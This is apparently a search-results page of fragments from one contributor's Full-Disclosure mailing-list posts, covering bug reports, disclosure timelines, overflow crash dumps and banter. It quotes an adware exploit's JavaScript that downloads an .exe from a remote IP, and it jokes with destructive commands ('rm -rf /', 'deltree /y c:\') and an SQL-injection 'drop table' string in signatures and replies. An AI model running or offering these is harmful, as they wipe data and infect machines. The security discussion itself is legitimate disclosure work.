video seems to address this with the vesa driver, but does add
several seconds to the startup.
I still need to file an official bug report but they are looking into it
anyway.
-KF
_evil wrote:
KF (lists) wrote:
i've had a similiar issue with a 3dfx banshee videocard and some
(beta)driver under
I have cc'd a link for the FD-archive on this thread to the
[EMAIL PROTECTED] alias... I will let you know if and when they respond.
-KF
Cassidy Macfarlane wrote:
Yeah.
In fact, imho, this should have moved off to the Xfree dev list a few
posts ago.. I trust the OP or someone along the line has
in the
morning I catch glimpses of stuff I viewed just prior to shutting the
machine down for the night.
Several folks have mentioned it could be related to the ram chips on the
video card.
-KF
___
Full-Disclosure - We believe in it.
Charter: http
That is a definate common thread on my end.
All three of the machines in quesion have the following in the X config.
Driver vesa
-KF
Rodrigo Barbosa wrote:
Looks like related to the VESA buffer, since I only saw it happen when
using the VESA driver
donwload != download.
damn lesdexia.
-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
, the next morning when my
Girlfriend turns my computer on she gets a quick 2 second shot of my
porn just before the KDM login screen.
What causes this? Can it be prevented? I can certainly see sensitive
data potentially being leaked via this quirk.
-KF
can't say if it happens while using gdm or xdm.
It does not seem to be specific to any particular video card either
since this happens on multiple machines.
-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure
Who knows ...
whats this ?
http://camera3.gnax.net/view/index.shtml?videos=one
what are these?
http://www.google.com/search?hl=enq=%2Fview%2Findex.shtml%3Fvideos%3DonebtnG=Google+Search
just non secure cameras man...
-KF
Tanvir wrote:
Hi
Can Some body tell me what is this?
http
in ?? ()
#6 0x0804f5bb in ?? ()
#7 0x080691cb in putchar ()
#8 0x4013bdc6 in __libc_start_main () from /lib/libc.so.6
#9 0x08049901 in ?? ()
-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Rafael Garcia-Suarez disabed PERLIO_DEBUG in sperl
01/31/2005 08:31 AM - perl #33990] [RESOLVED]
01/31/2005 11:15 AM - perl-5.8.6-bug33990.patch passed on from Mandrake cvs
02/02/2005 05:20 PM - Alternate patch provided [EMAIL PROTECTED]
-KF
/*
* Copyright Kevin Finisterre
, perlbug, vendor-sec et all
01/31/2005 04:25 AM - Rafael Garcia-Suarez disabed PERLIO_DEBUG in sperl
01/31/2005 08:31 AM - perl #33990] [RESOLVED]
01/31/2005 11:15 AM - perl-5.8.6-bug33990.patch passed on from Mandrake cvs
02/02/2005 05:20 PM - Alternate patch provided [EMAIL PROTECTED]
-KF
Eat a dick buddy... show some respect for the man.
-KF
Good Riddance.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
);
Timeline associated with this bug:
01/19/2005 attempts to notify all of the individuals working on the project via
email were made.
no response.
01/20/2005 BerliOS Developer bug ID #003087 Security Vulnerability ala
syslog() was filed.
no response.
-KF
/**
** Copyright Johnh and KF
There is nothing yet for this year but this would be a good start...
http://www.slackware.com/security/
http://www.slackware.com/lists/archive/
-KF
Carlos de Oliveira wrote:
Hi there!
I've seen linux distributions sometimes posting here on
full-disclosure it's security updates.
I use slackware
response
01/03/2005 09:17 PM - followup
01/12/2005 02:56 PM - ...
01/13/2005 08:41 PM - ...
01/19/2005 12:16 AM - confirm credit
01/20/2005 12:13 PM - immunitysec nukido release
-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com
so then the bottom line is that there is a bug. When files are being
transfered they should also be identified via the content of the file
rather than the extension...
-KF
The second one is also know feature, the file type is not determinated
from the extension but from the content of the file
Ok folks the damn sky IS NOT falling.
I just checked my SUS install and I have 10 new updates... so should you.
so lets all just FREAK [EMAIL PROTECTED]@#
-KF
Micheal Espinola Jr wrote:
Nope, its the typically the 2nd Tuesday of the month. Also, they are
PST. Myself being EST, I dont expect
Do a software update check with this thing and you get
GIANTAntiSpywareMain.exe listening on port 2571 until the software is
closed. Feel free to beat on and fuzz that port fellas. =]
-KF
KF (lists) wrote:
I love how the icon for this product is a big Target. Very
appropreate. Anyone wanna
I love how the icon for this product is a big Target. Very appropreate.
Anyone wanna takes bets on how long it takes for someone to find a hole
in the Spynet p2p functions of this beast, what port is that listening
on again?
*grin*
-KF
James Patterson Wicks wrote:
We knew that Microsoft
http://www.talkaboutsoftware.com/group/microsoft.public.windowsme.general/messages/241011.html
-KF
[EMAIL PROTECTED] wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Is anyone else seeing this:
- --SNIP--
;; QUESTION SECTION:
;www.microsoft.com. IN A
;; ANSWER SECTION
! This bug was found alive and kicking in the Solaris 10 Sun freeware
package.
-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Author did not respond and I could not exploit... enjoy.
there will be a proper advisory when I am not being so lazy
-KF
Kaffeine =0.4.2
http://kaffeine.sourceforge.net/download.html
Tested on SuSE Linux 9.1 on source compiled from kaffeine-0.4.3b.tar.bz2
also Tested on various SuSE and Fedora
gpsd and sniff away.
/usr/local/sbin/gpsd -p /dev/ttyS0
Happy war driving.
-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Try a deltree /y c:\that usually does the trick.
-KF
Todd Towles wrote:
The creator of CWShredder claims the newest versions of CWS are very
stealthy and I believe he as stopped updating the program. Therefore
CWShredder isn't the best for the newest. But as far as I understood things
(from
While on vacation I ran across this on a random PC that I was using. I
looks like your typical adware exploitation.
http://209.50.251.182/new-exploit5/
-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure
I suggest they change the double click to a tripple click, and while we
are at it how about making the default desktop walpaper something other
than light blue.
-KF
How about changing the .exe convention? Making a file executable by
it's extension probably causes a lot of opportunities
The Xbox attempts to rip your audio to the hard disk before playing it
right? This CD really sounds like crap on my Xbox... I am wondering if
the audio cuts in and out because of the copy protection they try to use.
-KF
[EMAIL PROTECTED] wrote:
Original Message
Subject: Caveat
that are being used? Aparantly the device scans vehicle license
plates as they pass and it in turn searches a database containing plates
of criminals and stolen cars.
-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure
!
cfolaptop hellocfovmware again
ctpdesktop helloctovmware! open source rules!
-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
0x41414141 0x41414141
esi0x12c300
edi0x40affab8 1085274808
eip0x41414141 0x41414141
eflags 0x10246 66118
(gdb) x/1s $esp
0x40aff5f8: 'A' repeats 144 times
[EMAIL PROTECTED] interbase]# ./bin/ibserver
Segmentation fault
-KF
So is this firebird specific or does it also impact Borland Interbase
users?
-KF
Aviram Jenik wrote:
Firebird Database Remote Database Name Overflow
Article reference:
http://www.securiteam.com/unixfocus/5AP0P0UCUO.html
Actually its more like 2 years old...
http://www.securiteam.com/unixfocus/5CP0S0U7FG.html
http://seclists.org/lists/bugtraq/2002/Jun/0212.html
I found that AGES ago. Hell I even sat on it 6 months while attempting
to get Borland to wake up (with out success).
Better late than never I guess.
-KF
If you guys are bored you may make sure that the FireBird Team fixed
this one too...
http://www.mail-archive.com/[EMAIL PROTECTED]/msg11512.html
-KF
KF (lists) wrote:
Actually its more like 2 years old...
http://www.securiteam.com/unixfocus/5CP0S0U7FG.html
http://seclists.org/lists/bugtraq/2002
When you cc multiple lists in the same email the tend to send out
multiple copies... this is nothing new.
-KF
Tobias Weisserth wrote:
Hi,
On Sun, 2004-05-23 at 19:01, José María Mateos wrote:
Hi,
Are you receiving a lot of gentoo-announces mail today or is it just
me? Some of them
I am certainly not mocking anyone... no need to imply that I was. I was
simply stating that this sort of thing has happened before with other
vendors posts as well as other individuals posting.
*flame on* we I love this list.
-KF
Luke Norman wrote:
KF (lists) wrote:
When you cc multiple
new or old?
-KF
Dante wrote:
Anyone aware of any vulnerabilities/exploits with the NTP protocol?
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full
I forgot about this one (seriously). =]. Reported to public May 2001.
Patched May 2004.
http://lists.netsys.com/pipermail/full-disclosure/2004-May/021178.html
http://www.blacksheepnetworks.com/security/security/fulldisc/1465.html
http://seclists.org/lists/vuln-dev/2002/Mar/0325.html
smbd aparantly likes them to be a 256 chars or less aparantly. =]
Apr 27 18:26:39 CloneRiot smbd[2670]: ERROR: string overflow by 1 (256
- 255) in safe_strcpy [AA]
-KF
Lan Guy wrote:
http://lists.samba.org/archive/jcifs/2003-February/001782
I have been unable to locate a good unicode return address...
but thats not to say there is not one there. =] . For those of you
wondering smb.conf DOES allow for characters like \x90 and other things
of that nature.
enjoy.
-KF
Paul Szabo wrote:
Anyway, http://support.microsoft.com/?kbid
I personally like how Visnetic lets you take Local SYSTEM rights.
-KF
Irwan Hadi wrote:
On Sat, Apr 24, 2004 at 06:18:50PM +0200, Ondrej Krajicek wrote:
Greetings to all disclosers ;),
I would like to see your opinion on currently available firewall
products for Windows Server 2003. I am
http://classes.weber.edu/wireless/
-KF
Jeff Schreiner wrote:
7 miles away is stretching it a bit far considering that all 802.11g
wireless transmissions range between 2.4 - 2.4835 Ghz 802.11a/h/j range
between 5.47 - 5.725 Ghz not only are the frequencies prone to scatter...the
radio waves
hehe that reminds me of when the trojaned sshd on koan had a password
something along the lines of cpm_likes_crack.
-KF
Paul Farrow wrote:
And this comes from the same person who accused schematic of the
happyhacker days of being a crack addict - and threatening him with jail.
long live
+++ATH0,,,DT911 was done plenty of times I am sure.
http://www.packetstormsecurity.org/9906-exploits/gin.c
-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Their non confirm / non deny policy kinda makes it difficult to talk
about security stuff anyway...
-KF
Chris Adams wrote:
On Feb 27, 2004, at 9:24, Chris Adams wrote:
Multiple issues with Mac OS X AFP client
Vendor Response:
None
After some discussion with someone on Apple's product
Man ... those voices in my head... they keep screaming DMCA!
-KF
[EMAIL PROTECTED] wrote:
I downloaded the Microsoft source code. Easy enough. It's a lot
bigger than Linux, but there were a lot of people mirroring it and so
it didn't take long.
Anyway, I took a look, and decided that Microsoft
Btw this does nothing to the IE on Win2k Version: 5.00.3700.1040,
Update Versions: SP4;Q824145:Q832894
-KF
KF wrote:
Man ... those voices in my head... they keep screaming DMCA!
-KF
[EMAIL PROTECTED] wrote:
I downloaded the Microsoft source code. Easy enough. It's a lot
bigger than Linux
please enlighten us on your versions numbers / patch levels wood.
-KF
morning_wood wrote:
IE6 is not vulnerable, so I guess I'll get back to work. My Warhol
worm will have to wait a bit...
Dunno but your message crashes OE on (pre)view.
no warning, no nothin... OE just *bink* closes
NICE JOB
Use a friggin subject line fools!
-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
I was simply replying to the original subject... If I changed it then it
would appear as a different thread or something. Here I'll fix it in
this one for ya.
=]
-KF
Paul Schmehl wrote:
--On Saturday, February 7, 2004 11:05 AM -0500 KF [EMAIL PROTECTED]
wrote:
Use a friggin subject line fools
[EMAIL PROTECTED] wrote:
On Sat, 07 Feb 2004 11:05:38 EST, KF [EMAIL PROTECTED] said:
Use a friggin subject line fools!
OK.. I'll bite. What subject line do you recommend for pointless
mail? ;)
I could care less... so long as it is something relating to the email
that is being sent. When
Bin Laden works . =P
-KF
Exibar wrote:
hrumph I just tried about a dozen maybe two dozen names and none
produced matches. Their database can't be that big :-)
William Gates
George W. Bush
were two names that I thought for sure would pop up something at
least. anyone find a name
of them is a Service pack... after the SP install you may find
that you now have 20 things to patch.
Feel free to correct me if I am wrong...
-KF
adam.richards wrote:
In Windows Update in the left column there is a section to customize Windows
Update. Make sure you don't have any blocked.
Adam
Caldera.com appears to be dead also.
-KF
Harry Hoffman wrote:
As pointed out to me by Sebastian it seems that SCO has removed the DNS entry
for www.sco.com.
Don't know if they planned to do that from the get-go, as no other DNS servers
that I contacted have it cached. I don't know what
Heres the other frame...
htmlbodyimg src=1.jpg width=500 height=400/body/html
textarea id=code style=display:none;
var x = new ActiveXObject(Microsoft.XMLHTTP);
x.Open(GET, http://211.19.46.20/5.exe ,0);
x.Send();
var s = new ActiveXObject(ADODB.Stream);
s.Mode = 3;
Secure Network Operations, Inc. http://www.secnetopscom/research
Strategic Reconnaissance Team research[at]secnetops[.]com
Team Lead Contact kf[at]secnetops[.]com
Spam Contact`rm -rf /[EMAIL PROTECTED]
Our
Secure Network Operations, Inc. http://www.secnetopscom/research
Strategic Reconnaissance Team research[at]secnetops[.]com
Team Lead Contact kf[at]secnetops[.]com
Spam Contact`rm -rf /[EMAIL PROTECTED]
Our
Secure Network Operations, Inc. http://www.secnetops.com/research
Strategic Reconnaissance Team research[at]secnetops[.]com
Team Lead Contact kf[at]secnetops[.]com
Spam Contact`rm -rf /[EMAIL PROTECTED]
Our
Secure Network Operations, Inc. http://www.secnetops.com/research
Strategic Reconnaissance Team research[at]secnetops[.]com
Team Lead Contact kf[at]secnetops[.]com
Spam Contact`rm -rf /[EMAIL PROTECTED]
Our
I am currious to know what you folks think the differences are between
obtaining local SYSTEM on a win32 box and obtaining root on a Unix machine.
Same thing?
Different?
One is worse than the other? Which one? Why?
*flame on*
-KF
___
Full-Disclosure
cached copy?
-KF
Dani Wuck wrote:
Daigoku wrote:
Are you able to go on the Help Net Security WebSite ?
(http://www.net-security.org) When i try to connect to HNS website i'm
redirected to a oingo website and you ?
The expiration date of the whois is 2004-01-18, i think they have been
victim
Yeah I know this one is short... theres a couple more on the way with
more in depth details.
-KF
Secure Network Operations, Inc. http://www.secnetops.com/research
Strategic Reconnaissance Team research[at]secnetops[.]com
Team Lead Contact kf
Secure Network Operations, Inc. http://www.secnetops.com/research
Strategic Reconnaissance Team research[at]secnetops[.]com
Team Lead Contact kf[at]secnetops[.]com
Spam Contact`rm -rf /[EMAIL PROTECTED]
Our
Please remember to try and take local SYSTEM privs from a personal
firewall tomorrow. =] . You may be surprised by what you find. Make
sure your choice of personal firewall does not explose you to other issues.
-KF
[EMAIL PROTECTED] wrote:
I just wanted to remind everybody that tomorrow
As usual full details are available at http://www.secnetops.biz/research
-KF
Secure Network Operations, Inc. http://www.secnetops.com/research
Strategic Reconnaissance Team research[at]secnetops[.]com
Team Lead Contact kf[at]secnetops[.]com
Spam
I don't believe there is a need to show the resulting binary
segfaulting... if gcc does not seg during the compile then its not vuln.
Running the a.out I would imagine segfaults everywhere.
-KF
$ gcc gcc-crash.c
$ ./a.out
Segmentation fault
___
Full
Fedora went barf... then rebooted.
-KF
Daniel Husand wrote:
Christophe Devine wrote:
| The following program can be used to test if a x86 Linux system
| is vulnerable to the do_mremap() exploit; use at your own risk.
|
| $ cat mremap_poc.c
|
This didnt do anything on my 2.4.23-grsec kernel
good god I have been getting an arse load of messages from those guys
too...
blah.
harvest these ya assholes: (friggin FD and bugtraq harvesters)
`rm -rf /[EMAIL PROTECTED]
|deltree \y c:\|@secnetops.biz
|rm -rf /|@secnetops.com
or 1=1; drop table email;@secnetops.org
-KF
noconflic wrote
=195.67.100.245
/var/log/messages:Jan 2 22:14:58 SRC=167.21.229.152
/var/log/messages:Jan 3 08:49:49 SRC=216.61.103.112
/var/log/messages:Jan 3 08:49:52 SRC=216.61.103.112
-KF
Jim Race wrote:
Rob Schrack wrote:
Oh yeah... just after Christmas, 6129 accounted for maybe 25% of the
packets
we submitted
does anyone have a good security contact at Veritas? I am not to keen on
using the http://enhancement.veritas.com/ web page to report a security
hole (as suggested by their phone staff).
-KF
___
Full-Disclosure - We believe in it.
Charter: http
Hacksaw Jim Duggan?
a product name would be a good start.
-KF
Jim Duggan wrote:
I have a system with a content manager that is enabled and obviously
passworded to which the password is not known. Might anyone know where
this key/enable flag is stored in registry? Im hopping i can either
just
I was expecting some fake IE link, some XSS or something along those
lines . Tis no joke. =]
-KF
Gideon Rasmussen, CISSP, CFSO, CFSA, SCSA wrote:
http://www.cnn.com/2003/WORLD/meast/12/14/sprj.irq.main/index.html
U.S.: 'We got him'
Coalition captures Saddam, 'talkative,' in raid near Tikrit
and other apps too.
http://www.psychoid.lam3rz.de/*sshsniff*.tar.gz
-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
I am a little behind on the web page update but regardless here is the
*necessary* information. Technical details will be available by the
weekend.
-KF
Secure Network Operations, Inc. http://www.secnetops.com/research
Strategic Reconnaissance Team [EMAIL PROTECTED]
Team
if you are bored download unrar.
-KF
rustymemory wrote:
By: flames.bluefox.net.nz
if unshar suid; then you w00t
proof of concept?
[EMAIL PROTECTED]:~$ unshar -f `perl -e 'printAx2000'`
AASegmentation fault
[EMAIL PROTECTED]:~$ more unshar.pl
#!/usr
Thats odd...so why exactly did you register for access to our archives.
heh.
also what part of *novelty* did you not understand?
have a good turkey day folks.
-KF
Tobias Klein wrote:
*gobble* *gobble*. - LoL ?
show me anyone who care about your stupid findings in useless software
which nobody
*gobble* *gobble*.
-KF
Secure Network Operations, Inc. http://www.secnetops.com/research
Strategic Reconnaissance Team [EMAIL PROTECTED]
Team Lead Contact [EMAIL PROTECTED]
Our Mission
Proof of concept attached.
=P
gotta love a troll.
-KF
---BeginMessage---
so we don't look dumb we should fix the 88 byte buffer overflow in ip-to-hex.
Starting program: /root/prod-source/RSN/bin/ip-to-hex `perl -e 'print A x 88'`
Ox00
Program received signal SIGSEGV, Segmentation fault
i do to... but just for the sake of argument say his corp change control
process states that after a new service is installed (or updated) the
system must be rebooted to make sure that the boot process was not damaged.
-KF
Hate to stick my nose in ths thread... but how updating SSH daemon
Secure Network Operations, Inc. http://www.secnetops.com/research
Strategic Reconnaissance Team [EMAIL PROTECTED]
Team Lead Contact [EMAIL PROTECTED]
Our Mission:
Secure
to something that was just released.
there were 17 critical vulnerabilities. For Windows Server 2003, there
were four. For Red Hat Linux 6, they were five to ten times higher.
-KF
___
Full-Disclosure - We believe in it.
Charter: http
Secure Network Operations, Inc. http://www.secnetops.com/research
Strategic Reconnaissance Team [EMAIL PROTECTED]
Team Lead Contact [EMAIL PROTECTED]
Our Mission:
Secure
lists.
-KF
Secure Network Operations, Inc. http://www.secnetops.com/research
Strategic Reconnaissance Team [EMAIL PROTECTED]
Team Lead Contact [EMAIL PROTECTED]
Our Mission
try sending mails one by one...
-KF
Alexander Antipov wrote:
What's shit? I did not send this message again!
Received: from NETSYS.COM ([199.201.233.10]:55737 EHLO netsys.com
smtp-auth:
none TLS-CIPHER: none TLS-PEER-CN1: none) by mail.yandex.ru
with ESMTP id
frequently on these lists. It is NOT my fault
that the lists (bugtraq / FD / et all) get into mailing loops and
repeatedly forward mails that have already went out. If I recall
correctly I only have ONE copy of this mailing in my out box.
2514 N Nov 04 KF ( 101) [Full-Disclosure] SRT2003
We are currently evaluating .pdf based advisory release... please let us
know if you have any issues with the pdf listed below.
Full details on this issue can be found at:
http://www.secnetops.com/research/advisories/SRT2003-11-02-0218.pdf
-KF
Secure Network Operations, Inc
We are currently evaluating .pdf based advisory release... please let us
know if you have any issues with the pdf listed below.
Full details on this issue can be found at:
http://www.secnetops.com/research/advisories/SRT2003-11-02-0115.pdf
-KF
Secure Network Operations, Inc. http
of the page can you see the list? If not what
browser are you using?
If you did click the pdf and nothing happened, does your browser pluging
for .pdf does function on other sites?
Can you simply right click and save the .pdf?
Thanks for the feedback.
-KF
is consistent with a variation of the Nachi or LovSan worms.
Once a host is infected, it will attempt to propagate outbound via port 445.
-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
or is this purely
informational and intended to help those using the help functions
program properly?
for an example of this type of attack please see:
http://securityresponse.symantec.com/avcenter/security/Content/2002.10.15.html
-KF
Brett Moore wrote
Sebastian Niehaus wrote:
KF [EMAIL PROTECTED] writes:
[...]
I would relate this
type of attack to a setuid program calling system(clear) while
running as root on a unix machine. This does not mean that system() is
flawed rather that when implementing this call you need to be more
careful
Snot as much as you annoy me somtimes you are always there for a good
laugh...
people like you make this list amusing keep it up.
btw... pipe those mad perl.exe skillz through netcat.exe and you are in
business. *grin*
-KF
security snot wrote:
C:\perl.exe -e ...
won't help you find bugs
ADS?
-KF
James Kelly wrote:
I seem to remember in the dim reaches of my memory a covert channel in
the Windows file system where you could paste one file at the end of
another without it being detectible when you edited the orginal file.
can someone aim me at the right buzz phrase
Heh watch out for that DMCA.
-KF
Lorenzo Hernandez Garcia-Hierro wrote:
Dear Paul,
I've testing your exploit ( good one ) for the supposed html encryption weak
of SaS.
I think yo toke the exploit/perl script from a developers site because SaS
is using an standard of encoding,
here is the proof
Oh yeah it was LSD
http://msgs.securepoint.com/cgi-bin/get/bugtraq0211/255.html
that sucks... get stiffed by PitBull and Netscape both.
-KF
KF wrote:
Didn't they *forget* to pay someone at least once?
-KF
zen-parse wrote:
Hi,
There used to be a cash reward for researchers finding
security
Didn't they *forget* to pay someone at least once?
-KF
zen-parse wrote:
Hi,
There used to be a cash reward for researchers finding
security bugs in Netscape products. Does anyone know
if they still offer the cash?
According to an email I got this morning, yes they do.
And a quick google
http
I am going to laugh when symantec sues you folks for squating. =]
-KF
Jonathan A. Zdziarski wrote:
Wouldn't it be more appropriate to register bugtraq.biz?
On Sat, 2003-10-04 at 00:25, c.ayala wrote:
They don't take checks?
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL
Linux Mozilla is happy with it... perhaps its time for a switch?
=]
-KF
Schmehl, Paul L wrote:
-Original Message-
From: Andre Ludwig [mailto:[EMAIL PROTECTED]
Sent: Wednesday, October 01, 2003 10:42 PM
To: '[EMAIL PROTECTED]'; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Mystery DNS
http://www.google.com/dmca.html
-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
felt his work for CERT was up to
snuff... nothing more nothing less. GET OVER IT!
-KF
CISSP / CCNA / A+ Certified - www.unixclan.net/~kf/
security snot wrote:
Sure, knowing that CERT/Honeynet is a bunch of pedophiles (and that the
behavior is sanctioned by Snosoft.com - that's right folks, Snosoft
=1108546328,
event=OOP_READ, data=0x809ba08)
at io.c:134
#15 0x40084dcf in oop_sys_run (sys=0x808ef28) at sys.c:372
#16 0x08055065 in io_run () at io.c:331
#17 0x0804b442 in main (argc=1, argv=0xb4e4) at lshd.c:1116
#18 0x42015574 in __libc_start_main () from /lib/tls/libc.so.6
-KF
KF wrote
1 - 100 of 193 matches
Mail list logo
